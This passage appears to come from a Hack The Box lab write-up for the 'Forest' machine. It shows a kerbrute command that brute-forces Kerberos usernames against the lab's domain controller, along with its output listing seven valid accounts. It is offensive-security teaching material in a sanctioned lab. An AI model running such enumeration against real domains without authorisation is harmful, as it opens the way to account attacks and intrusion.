Kerberos
Nmap discovered a Kerberos service running over the target port 88 and 464
Username enumeration
Given the fact that I don’t have any credential, I can aim to enumerate some valid domain username by brute-forcing the Kerberos service.
┌──(kali㉿kali)-[~/archive/htb/labs/forest]
└─$ kerbrute userenum --dc $IP -d htb.local /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 01/22/23 - Ronnie Flathers @ropnop
2023/01/22 13:01:34 > Using KDC(s):
2023/01/22 13:01:34 > 10.10.10.161:88
2023/01/22 13:01:34 > [+] VALID USERNAME: mark@htb.local
2023/01/22 13:01:34 > [+] VALID USERNAME: andy@htb.local
2023/01/22 13:01:37 > [+] VALID USERNAME: forest@htb.local
2023/01/22 13:01:39 > [+] VALID USERNAME: administrator@htb.local
2023/01/22 13:01:49 > [+] VALID USERNAME: sebastien@htb.local
2023/01/22 13:02:08 > [+] VALID USERNAME: santi@htb.local
2023/01/22 13:02:12 > [+] VALID USERNAME: lucinda@htb.localKerbrute identified a total of 7 valid domain users:
markandyforestadministratorsebastiensantilucinda